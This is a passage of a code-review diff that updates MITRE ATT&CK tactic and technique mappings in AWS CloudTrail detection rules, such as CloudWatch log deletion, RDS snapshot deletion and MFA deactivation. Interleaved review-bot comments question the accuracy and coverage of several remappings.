@@ -78,16 +88,46 @@ event.dataset: "aws.cloudtrail" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1567" name = "Exfiltration Over Web Service" reference = "https://attack.mitre.org/techniques/T1567/" + [rule.threat.tactic] id = "TA0010" name = "Exfiltration" reference = "https://attack.mitre.org/tactics/TA0010/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1530" +name = "Data from Cloud Storage" +reference = "https://attack.mitre.org/techniques/T1530/" + + +[rule.threat.tactic] +id = "TA0009" +name = "Collection" +reference = "https://attack.mitre.org/tactics/TA0009/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1496" +name = "Resource Hijacking" +reference = "https://attack.mitre.org/techniques/T1496/" +[[rule.threat.technique.subtechnique]] +id = "T1496.004" +name = "Cloud Service Hijacking" +reference = "https://attack.mitre.org/techniques/T1496/004/" + + + +[rule.threat.tactic] +id = "TA0040" +name = "Impact" +reference = "https://attack.mitre.org/tactics/TA0040/" + [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/impact_aws_eventbridge_rule_disabled_or_deleted.toml b/rules/integrations/aws/impact_aws_eventbridge_rule_disabled_or_deleted.toml index 1f89a48a949..4b6fbec2338 100644 --- a/rules/integrations/aws/impact_aws_eventbridge_rule_disabled_or_deleted.toml +++ b/rules/integrations/aws/impact_aws_eventbridge_rule_disabled_or_deleted.toml @@ -2,7 +2,7 @@ creation_date = "2021/10/17" integration = ["aws"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/16" [rule] author = ["Austin Songer", "Elastic"] 
@@ -100,7 +100,14 @@ references = [ risk_score = 21 rule_id = "87594192-4539-4bc4-8543-23bc3d5bd2b4" severity = "low" -tags = ["Domain: Cloud", "Tactic: Defense Evasion", "Data Source: AWS", "Data Source: Amazon Web Services", "Data Source: AWS EventBridge", "Resources: Investigation Guide"] +tags = [ + "Domain: Cloud", + "Data Source: AWS", + "Data Source: Amazon Web Services", + "Data Source: AWS EventBridge", + "Tactic: Impact", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "query" @@ -114,16 +121,17 @@ event.dataset: aws.cloudtrail [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1562" -name = "Impair Defenses" -reference = "https://attack.mitre.org/techniques/T1562/" +id = "T1489" +name = "Service Stop" +reference = "https://attack.mitre.org/techniques/T1489/" + [rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" +id = "TA0040" +name = "Impact" +reference = "https://attack.mitre.org/tactics/TA0040/" + [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/impact_aws_s3_bucket_enumeration_or_brute_force.toml b/rules/integrations/aws/impact_aws_s3_bucket_enumeration_or_brute_force.toml index 6f372dd93a0..013d9381c79 100644 --- a/rules/integrations/aws/impact_aws_s3_bucket_enumeration_or_brute_force.toml +++ b/rules/integrations/aws/impact_aws_s3_bucket_enumeration_or_brute_force.toml @@ -2,7 +2,7 @@ creation_date = "2024/05/01" integration = ["aws"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/16" [rule] author = ["Elastic"] 
@@ -80,7 +80,17 @@ references = [ risk_score = 21 rule_id = "5f0234fd-7f21-42af-8391-511d5fd11d5c" severity = "low" -tags = ["Domain: Cloud", "Tactic: Discovery", "Data Source: AWS", "Data Source: Amazon Web Services", "Data Source: AWS S3", "Resources: Investigation Guide", "Use Case: Log Auditing"] +tags = [ + "Domain: Cloud", + "Data Source: AWS", + "Data Source: Amazon Web Services", + "Data Source: AWS S3", + "Resources: Investigation Guide", + "Use Case: Log Auditing", + "Tactic: Impact", + "Tactic: Discovery", + "Tactic: Collection", +] timestamp_override = "event.ingested" type = "threshold" @@ -101,7 +111,18 @@ field_names = [ [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1657" +name = "Financial Theft" +reference = "https://attack.mitre.org/techniques/T1657/" + +[rule.threat.tactic] +id = "TA0040" +name = "Impact" +reference = "https://attack.mitre.org/tactics/TA0040/" +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1619" name = "Cloud Storage Object Discovery" @@ -111,6 +132,20 @@ reference = "https://attack.mitre.org/techniques/T1619/" id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1530" +name = "Data from Cloud Storage" +reference = "https://attack.mitre.org/techniques/T1530/" + + +[rule.threat.tactic] +id = "TA0009" +name = "Collection" +reference = "https://attack.mitre.org/tactics/TA0009/" + + [rule.threshold] field = ["tls.client.server_name", "source.address", "aws.cloudtrail.user_identity.type"] value = 1 diff --git a/rules/integrations/aws/impact_cloudtrail_logging_updated.toml b/rules/integrations/aws/impact_cloudtrail_logging_updated.toml index 05d22d3c38f..f19cadad27f 100644 --- a/rules/integrations/aws/impact_cloudtrail_logging_updated.toml +++ b/rules/integrations/aws/impact_cloudtrail_logging_updated.toml 
@@ -2,7 +2,7 @@ creation_date = "2020/06/10" integration = ["aws"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/16" [rule] author = ["Elastic"] @@ -65,7 +65,15 @@ references = [ risk_score = 21 rule_id = "3e002465-876f-4f04-b016-84ef48ce7e5d" severity = "low" -tags = ["Domain: Cloud", "Tactic: Defense Evasion", "Data Source: AWS", "Data Source: Amazon Web Services", "Data Source: AWS Cloudtrail", "Use Case: Log Auditing", "Resources: Investigation Guide"] +tags = [ + "Domain: Cloud", + "Data Source: AWS", + "Data Source: Amazon Web Services", + "Data Source: AWS Cloudtrail", + "Use Case: Log Auditing", + "Resources: Investigation Guide", + "Tactic: Impact", +] timestamp_override = "event.ingested" type = "query" @@ -79,21 +87,34 @@ event.dataset: "aws.cloudtrail" [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1565" +name = "Data Manipulation" +reference = "https://attack.mitre.org/techniques/T1565/" +[[rule.threat.technique.subtechnique]] +id = "T1565.001" +name = "Stored Data Manipulation" +reference = "https://attack.mitre.org/techniques/T1565/001/" + + +[rule.threat.tactic] +id = "TA0040" +name = "Impact" +reference = "https://attack.mitre.org/tactics/TA0040/" +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1562" -name = "Impair Defenses" -reference = "https://attack.mitre.org/techniques/T1562/" +id = "T1530" +name = "Data from Cloud Storage" +reference = "https://attack.mitre.org/techniques/T1530/" -[[rule.threat.technique.subtechnique]] -id = "T1562.008" -name = "Disable or Modify Cloud Logs" -reference = "https://attack.mitre.org/techniques/T1562/008/" [rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" +id = "TA0009" +name = "Collection" +reference = "https://attack.mitre.org/tactics/TA0009/" + [rule.investigation_fields] field_names = [ "@timestamp", 
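Review bot: The new tag list carries only `"Tactic: Impact"`, but the threat hunk further down in the same file adds a second `[[rule.threat]]` whose tactic is `id = "TA0009"` / `name = "Collection"`, so `"Tactic: Collection",` is missing from the tags. Separately, the removed `T1562.008` `Disable or Modify Cloud Logs` is the ATT&CK technique for tampering with cloud audit logging, and this rule fires on a CloudTrail configuration update; replacing it with T1565.001 (Stored Data Manipulation) and T1530 (Data from Cloud Storage) removes the Defense Evasion coverage that gap reporting against ATT&CK relies on. Keeping the T1562.008 entry alongside the new ones would preserve that.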
diff --git a/rules/integrations/aws/impact_cloudwatch_log_group_deletion.toml b/rules/integrations/aws/impact_cloudwatch_log_group_deletion.toml index 461ca5fca01..1f6a8dd5d98 100644 --- a/rules/integrations/aws/impact_cloudwatch_log_group_deletion.toml +++ b/rules/integrations/aws/impact_cloudwatch_log_group_deletion.toml @@ -2,7 +2,7 @@ creation_date = "2020/05/18" integration = ["aws"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/21" [rule] author = ["Elastic"] @@ -126,7 +126,16 @@ references = [ risk_score = 47 rule_id = "68a7a5a5-a2fc-4a76-ba9f-26849de881b4" severity = "medium" -tags = ["Domain: Cloud", "Tactic: Defense Evasion", "Data Source: AWS", "Data Source: Amazon Web Services", "Data Source: Amazon CloudWatch", "Use Case: Log Auditing", "Resources: Investigation Guide"] +tags = [ + "Domain: Cloud", + "Data Source: AWS", + "Data Source: Amazon Web Services", + "Data Source: Amazon CloudWatch", + "Use Case: Log Auditing", + "Resources: Investigation Guide", + "Tactic: Defense Evasion", + "Tactic: Impact", +] timestamp_override = "event.ingested" type = "query" 
@@ -142,21 +151,34 @@ event.dataset: "aws.cloudtrail" [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1485" +name = "Data Destruction" +reference = "https://attack.mitre.org/techniques/T1485/" + +[rule.threat.tactic] +id = "TA0040" +name = "Impact" +reference = "https://attack.mitre.org/tactics/TA0040/" +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" - [[rule.threat.technique.subtechnique]] -id = "T1562.008" -name = "Disable or Modify Cloud Logs" -reference = "https://attack.mitre.org/techniques/T1562/008/" +id = "T1562.001" +name = "Disable or Modify Tools" +reference = "https://attack.mitre.org/techniques/T1562/001/" + + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/impact_cloudwatch_log_stream_deletion.toml b/rules/integrations/aws/impact_cloudwatch_log_stream_deletion.toml index 2579dfe7c4f..6312cf48c76 100644 --- a/rules/integrations/aws/impact_cloudwatch_log_stream_deletion.toml +++ b/rules/integrations/aws/impact_cloudwatch_log_stream_deletion.toml @@ -2,7 +2,7 @@ creation_date = "2020/05/20" integration = ["aws"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/21" [rule] author = ["Elastic"] 
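Review bot: The Defense Evasion entry swaps the removed `T1562.008` `Disable or Modify Cloud Logs` for `T1562.001` `Disable or Modify Tools`, but deleting a CloudWatch log group is log tampering in a cloud service, which is what T1562.008 describes; T1562.001 is about security tooling on a host. The same swap is made for the log stream deletion rule in the next hunk. Restoring `id = "T1562.008"` / `name = "Disable or Modify Cloud Logs"` / `reference = "https://attack.mitre.org/techniques/T1562/008/"` keeps the mapping accurate, and the new T1485 Impact entry can stay beside it.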
@@ -113,7 +113,16 @@ references = [ risk_score = 47 rule_id = "d624f0ae-3dd1-4856-9aad-ccfe4d4bfa17" severity = "medium" -tags = ["Domain: Cloud", "Tactic: Defense Evasion", "Data Source: AWS", "Data Source: Amazon Web Services", "Data Source: Amazon CloudWatch", "Use Case: Log Auditing", "Resources: Investigation Guide"] +tags = [ + "Domain: Cloud", + "Data Source: AWS", + "Data Source: Amazon Web Services", + "Data Source: Amazon CloudWatch", + "Use Case: Log Auditing", + "Tactic: Defense Evasion", + "Tactic: Impact", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "query" @@ -129,21 +138,34 @@ event.dataset: "aws.cloudtrail" [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1485" +name = "Data Destruction" +reference = "https://attack.mitre.org/techniques/T1485/" + +[rule.threat.tactic] +id = "TA0040" +name = "Impact" +reference = "https://attack.mitre.org/tactics/TA0040/" +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" - [[rule.threat.technique.subtechnique]] -id = "T1562.008" -name = "Disable or Modify Cloud Logs" -reference = "https://attack.mitre.org/techniques/T1562/008/" +id = "T1562.001" +name = "Disable or Modify Tools" +reference = "https://attack.mitre.org/techniques/T1562/001/" + + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/impact_ec2_disable_ebs_encryption.toml b/rules/integrations/aws/impact_ec2_disable_ebs_encryption.toml index 59ca5c226e9..0aa53f8fd0e 100644 --- a/rules/integrations/aws/impact_ec2_disable_ebs_encryption.toml +++ b/rules/integrations/aws/impact_ec2_disable_ebs_encryption.toml 
@@ -2,7 +2,7 @@ creation_date = "2020/06/05" integration = ["aws"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/16" [rule] author = ["Elastic"] @@ -107,7 +107,14 @@ references = [ risk_score = 47 rule_id = "bb9b13b2-1700-48a8-a750-b43b0a72ab69" severity = "medium" -tags = ["Domain: Cloud", "Tactic: Defense Evasion", "Data Source: AWS", "Data Source: Amazon Web Services", "Data Source: AWS EC2", "Resources: Investigation Guide"] +tags = [ + "Domain: Cloud", + "Data Source: AWS", + "Data Source: Amazon Web Services", + "Data Source: AWS EC2", + "Tactic: Impact", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "query" @@ -118,21 +125,22 @@ event.dataset:aws.cloudtrail and event.provider:ec2.amazonaws.com and event.acti [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1578" -name = "Modify Cloud Compute Infrastructure" -reference = "https://attack.mitre.org/techniques/T1578/" - +id = "T1565" +name = "Data Manipulation" +reference = "https://attack.mitre.org/techniques/T1565/" [[rule.threat.technique.subtechnique]] -id = "T1578.005" -name = "Modify Cloud Compute Configurations" -reference = "https://attack.mitre.org/techniques/T1578/005/" +id = "T1565.001" +name = "Stored Data Manipulation" +reference = "https://attack.mitre.org/techniques/T1565/001/" + + [rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" +id = "TA0040" +name = "Impact" +reference = "https://attack.mitre.org/tactics/TA0040/" + [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/impact_ec2_ebs_snapshot_access_removed.toml b/rules/integrations/aws/impact_ec2_ebs_snapshot_access_removed.toml index 6bc872fe7e4..1221591ba53 100644 --- a/rules/integrations/aws/impact_ec2_ebs_snapshot_access_removed.toml +++ b/rules/integrations/aws/impact_ec2_ebs_snapshot_access_removed.toml 
@@ -2,7 +2,7 @@ creation_date = "2025/06/02" integration = ["aws"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/21" [rule] author = ["Elastic"] @@ -116,16 +116,22 @@ info where event.dataset == "aws.cloudtrail" [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1485" +name = "Data Destruction" +reference = "https://attack.mitre.org/techniques/T1485/" [[rule.threat.technique]] id = "T1490" name = "Inhibit System Recovery" reference = "https://attack.mitre.org/techniques/T1490/" + [rule.threat.tactic] id = "TA0040" name = "Impact" reference = "https://attack.mitre.org/tactics/TA0040/" + [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/impact_iam_deactivate_mfa_device.toml b/rules/integrations/aws/impact_iam_deactivate_mfa_device.toml index 47d2cd2bd7c..2a685166ca7 100644 --- a/rules/integrations/aws/impact_iam_deactivate_mfa_device.toml +++ b/rules/integrations/aws/impact_iam_deactivate_mfa_device.toml @@ -2,7 +2,7 @@ creation_date = "2020/05/26" integration = ["aws"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/21" [rule] author = ["Elastic", "Austin Songer"] @@ -93,7 +93,16 @@ references = [ risk_score = 47 rule_id = "d8fc1cca-93ed-43c1-bbb6-c0dd3eff2958" severity = "medium" -tags = ["Domain: Cloud", "Tactic: Defense Evasion", "Tactic: Persistence", "Data Source: AWS", "Data Source: Amazon Web Services", "Data Source: AWS CloudTrail", "Data Source: AWS IAM", "Resources: Investigation Guide"] +tags = [ + "Domain: Cloud", + "Data Source: AWS", + "Data Source: Amazon Web Services", + "Data Source: AWS CloudTrail", + "Data Source: AWS IAM", + "Resources: Investigation Guide", + "Tactic: Impact", + "Tactic: Persistence", +] timestamp_override = "event.ingested" type = "query" 
@@ -107,39 +116,34 @@ event.dataset: aws.cloudtrail [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1556" -name = "Modify Authentication Process" -reference = "https://attack.mitre.org/techniques/T1556/" +id = "T1531" +name = "Account Access Removal" +reference = "https://attack.mitre.org/techniques/T1531/" -[[rule.threat.technique.subtechnique]] -id = "T1556.006" -name = "Multi-Factor Authentication" -reference = "https://attack.mitre.org/techniques/T1556/006/" [rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - +id = "TA0040" +name = "Impact" +reference = "https://attack.mitre.org/tactics/TA0040/" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1556" name = "Modify Authentication Process" reference = "https://attack.mitre.org/techniques/T1556/" - [[rule.threat.technique.subtechnique]] id = "T1556.006" name = "Multi-Factor Authentication" reference = "https://attack.mitre.org/techniques/T1556/006/" + + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/impact_rds_instance_cluster_deletion_protection_disabled.toml b/rules/integrations/aws/impact_rds_instance_cluster_deletion_protection_disabled.toml index 3a697f610ce..d12ddb1dc74 100644 --- a/rules/integrations/aws/impact_rds_instance_cluster_deletion_protection_disabled.toml +++ b/rules/integrations/aws/impact_rds_instance_cluster_deletion_protection_disabled.toml @@ -2,7 +2,7 @@ creation_date = "2024/06/28" integration = ["aws"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/21" [rule] author = ["Elastic"] 
@@ -101,7 +101,15 @@ references = [ risk_score = 47 rule_id = "f6652fb5-cd8e-499c-8311-2ce2bb6cac62" severity = "medium" -tags = ["Domain: Cloud", "Tactic: Defense Evasion", "Data Source: AWS", "Data Source: Amazon Web Services", "Data Source: AWS RDS", "Resources: Investigation Guide", "Use Case: Threat Detection"] +tags = [ + "Domain: Cloud", + "Data Source: AWS", + "Data Source: Amazon Web Services", + "Data Source: AWS RDS", + "Resources: Investigation Guide", + "Use Case: Threat Detection", + "Tactic: Impact", +] timestamp_override = "event.ingested" type = "eql" @@ -116,16 +124,17 @@ any where event.dataset == "aws.cloudtrail" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1562" -name = "Impair Defenses" -reference = "https://attack.mitre.org/techniques/T1562/" +id = "T1485" +name = "Data Destruction" +reference = "https://attack.mitre.org/techniques/T1485/" + [rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" +id = "TA0040" +name = "Impact" +reference = "https://attack.mitre.org/tactics/TA0040/" + [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/impact_rds_snapshot_deleted.toml b/rules/integrations/aws/impact_rds_snapshot_deleted.toml index dfd3f15f6b9..7e6e4313c9b 100644 --- a/rules/integrations/aws/impact_rds_snapshot_deleted.toml +++ b/rules/integrations/aws/impact_rds_snapshot_deleted.toml @@ -2,7 +2,7 @@ creation_date = "2024/06/29" integration = ["aws"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/16" [rule] author = ["Elastic"] 
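Review bot: Mapping a rule that fires when RDS deletion protection is disabled to `T1485` `Data Destruction` asserts destruction that has not happened yet; the action removes a safeguard so that a later delete can succeed. `T1490` `Inhibit System Recovery`, which the EBS snapshot access rule earlier in this diff retains, is the closer Impact technique for removing a recovery safeguard, and the removed T1562 Defense Evasion entry is arguably still valid for the same reason. Worth checking the rule's query before the old mapping is dropped outright.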
@@ -154,16 +154,17 @@ any where event.dataset == "aws.cloudtrail" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1490" -name = "Inhibit System Recovery" -reference = "https://attack.mitre.org/techniques/T1490/" +id = "T1485" +name = "Data Destruction" +reference = "https://attack.mitre.org/techniques/T1485/" + [rule.threat.tactic] id = "TA0040" name = "Impact" reference = "https://attack.mitre.org/tactics/TA0040/" + [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/impact_s3_bucket_object_uploaded_with_ransom_keyword.toml b/rules/integrations/aws/impact_s3_bucket_object_uploaded_with_ransom_keyword.toml index daebbd7abb6..36ccc844da3 100644 --- a/rules/integrations/aws/impact_s3_bucket_object_uploaded_with_ransom_keyword.toml +++ b/rules/integrations/aws/impact_s3_bucket_object_uploaded_with_ransom_keyword.toml @@ -2,7 +2,7 @@ creation_date = "2024/04/17" integration = ["aws"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/19" [rule] author = ["Elastic"] @@ -148,18 +148,18 @@ field_names = [ [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1565" -name = "Data Manipulation" -reference = "https://attack.mitre.org/techniques/T1565/" +id = "T1485" +name = "Data Destruction" +reference = "https://attack.mitre.org/techniques/T1485/" -[[rule.threat.technique.subtechnique]] -id = "T1565.001" -name = "Stored Data Manipulation" -reference = "https://attack.mitre.org/techniques/T1565/001/" +[[rule.threat.technique]] +id = "T1486" +name = "Data Encrypted for Impact" +reference = "https://attack.mitre.org/techniques/T1486/" [rule.threat.tactic] id = "TA0040" name = "Impact" reference = "https://attack.mitre.org/tactics/TA0040/" + diff --git a/rules/integrations/aws/initial_access_console_login_root.toml b/rules/integrations/aws/initial_access_console_login_root.toml index df37ae1e4e8..a8842b9754b 100644 
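Review bot: The removed `T1490` `Inhibit System Recovery` is the technique that covers deleting backups and snapshots, and the EBS snapshot access rule earlier in this diff keeps both T1485 and T1490 under Impact. Replacing T1490 with T1485 for an RDS snapshot deletion is a loss of coverage rather than a correction; keeping both `[[rule.threat.technique]]` tables, as that sibling rule does, is the consistent choice.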
--- a/rules/integrations/aws/initial_access_console_login_root.toml +++ b/rules/integrations/aws/initial_access_console_login_root.toml @@ -2,7 +2,7 @@ creation_date = "2020/06/11" integration = ["aws"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/16" [rule] author = ["Elastic"] @@ -95,7 +95,16 @@ references = ["https://docs.aws.amazon.com/IAM/latest/UserGuide/id_root-user.htm risk_score = 47 rule_id = "e2a67480-3b79-403d-96e3-fdd2992c50ef" severity = "medium" -tags = ["Domain: Cloud", "Tactic: Initial Access", "Data Source: AWS", "Data Source: Amazon Web Services", "Data Source: AWS Sign-In", "Use Case: Identity and Access Audit", "Resources: Investigation Guide"] +tags = [ + "Domain: Cloud", + "Data Source: AWS", + "Data Source: Amazon Web Services", + "Data Source: AWS Sign-In", + "Use Case: Identity and Access Audit", + "Resources: Investigation Guide", + "Tactic: Initial Access", + "Tactic: Privilege Escalation", +] timestamp_override = "event.ingested" type = "query" @@ -124,12 +133,10 @@ field_names = [ [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" - [[rule.threat.technique.subtechnique]] id = "T1078.004" name = "Cloud Accounts" @@ -139,3 +146,19 @@ reference = "https://attack.mitre.org/techniques/T1078/004/" id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" +[[rule.threat.technique.subtechnique]] +id = "T1078.004" +name = "Cloud Accounts" +reference = "https://attack.mitre.org/techniques/T1078/004/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" + 
diff --git a/rules/integrations/aws/initial_access_password_recovery.toml b/rules/integrations/aws/initial_access_password_recovery.toml index 2858c38caf0..32b17765f99 100644 --- a/rules/integrations/aws/initial_access_password_recovery.toml +++ b/rules/integrations/aws/initial_access_password_recovery.toml @@ -2,7 +2,7 @@ creation_date = "2020/07/02" integration = ["aws"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/16" [rule] author = ["Elastic"] @@ -123,3 +123,16 @@ field_names = [ "aws.cloudtrail.response_elements" ] +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + + +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" + diff --git a/rules/integrations/aws/lateral_movement_ec2_instance_connect_ssh_public_key_uploaded.toml b/rules/integrations/aws/lateral_movement_ec2_instance_connect_ssh_public_key_uploaded.toml index 889051ca438..7a3ec1d8500 100644 --- a/rules/integrations/aws/lateral_movement_ec2_instance_connect_ssh_public_key_uploaded.toml +++ b/rules/integrations/aws/lateral_movement_ec2_instance_connect_ssh_public_key_uploaded.toml @@ -2,7 +2,7 @@ creation_date = "2024/04/30" integration = ["aws"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/21" [rule] author = ["Elastic"] 
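Review bot: A threat mapping is added to a rule whose `tags` are not touched by this diff, so the tag list should be checked for `"Tactic: Initial Access"` to match the new `[rule.threat.tactic]` entry `id = "TA0001"`; every other rule in this diff changes tags and threat together. The new block is also appended with two blank lines before `[rule.threat.tactic]` and a trailing blank line at end of file, which does not match the spacing the old side of the other files used.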
@@ -67,7 +67,16 @@ references = [ risk_score = 47 rule_id = "873b5452-074e-11ef-852e-f661ea17fbcc" severity = "medium" -tags = ["Domain: Cloud", "Tactic: Persistence", "Data Source: AWS", "Data Source: Amazon Web Services", "Data Source: AWS EC2", "Use Case: Identity and Access Audit", "Resources: Investigation Guide"] +tags = [ + "Domain: Cloud", + "Data Source: AWS", + "Data Source: Amazon Web Services", + "Data Source: AWS EC2", + "Use Case: Identity and Access Audit", + "Tactic: Privilege Escalation", + "Tactic: Lateral Movement", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "query" @@ -97,18 +106,36 @@ field_names = [ [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1021" +name = "Remote Services" +reference = "https://attack.mitre.org/techniques/T1021/" +[[rule.threat.technique.subtechnique]] +id = "T1021.004" +name = "SSH" +reference = "https://attack.mitre.org/techniques/T1021/004/" + + +[rule.threat.tactic] +id = "TA0008" +name = "Lateral Movement" +reference = "https://attack.mitre.org/tactics/TA0008/" +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" - [[rule.threat.technique.subtechnique]] id = "T1098.004" name = "SSH Authorized Keys" reference = "https://attack.mitre.org/techniques/T1098/004/" + + [rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" + diff --git a/rules/integrations/aws/lateral_movement_ec2_instance_console_login.toml b/rules/integrations/aws/lateral_movement_ec2_instance_console_login.toml index ffdeb1c355e..e8de6075067 100644 --- a/rules/integrations/aws/lateral_movement_ec2_instance_console_login.toml +++ b/rules/integrations/aws/lateral_movement_ec2_instance_console_login.toml 
@@ -2,7 +2,7 @@ creation_date = "2024/07/24" integration = ["aws"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/16" [rule] author = ["Elastic"] @@ -97,7 +97,19 @@ references = [ risk_score = 73 rule_id = "d1e5e410-3e34-412e-9b1f-dd500b3b55cd" severity = "high" -tags = ["Domain: Cloud", "Tactic: Initial Access", "Tactic: Lateral Movement", "Data Source: AWS", "Data Source: Amazon Web Services", "Data Source: AWS EC2", "Data Source: AWS STS", "Data Source: AWS Sign-In", "Use Case: Identity and Access Audit", "Resources: Investigation Guide"] +tags = [ + "Domain: Cloud", + "Data Source: AWS", + "Data Source: Amazon Web Services", + "Data Source: AWS EC2", + "Data Source: AWS STS", + "Data Source: AWS Sign-In", + "Use Case: Identity and Access Audit", + "Tactic: Lateral Movement", + "Tactic: Credential Access", + "Tactic: Persistence", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" 
@@ -113,39 +125,66 @@ info where event.dataset == "aws.cloudtrail" [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1021" +name = "Remote Services" +reference = "https://attack.mitre.org/techniques/T1021/" +[[rule.threat.technique.subtechnique]] +id = "T1021.007" +name = "Cloud Services" +reference = "https://attack.mitre.org/techniques/T1021/007/" + +[[rule.threat.technique]] +id = "T1550" +name = "Use Alternate Authentication Material" +reference = "https://attack.mitre.org/techniques/T1550/" +[[rule.threat.technique.subtechnique]] +id = "T1550.001" +name = "Application Access Token" +reference = "https://attack.mitre.org/techniques/T1550/001/" + + + +[rule.threat.tactic] +id = "TA0008" +name = "Lateral Movement" +reference = "https://attack.mitre.org/tactics/TA0008/" +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" - [[rule.threat.technique.subtechnique]] id = "T1078.004" name = "Cloud Accounts" reference = "https://attack.mitre.org/techniques/T1078/004/" -[rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1021" -name = "Remote Services" -reference = "https://attack.mitre.org/techniques/T1021/" - +id = "T1552" +name = "Unsecured Credentials" +reference = 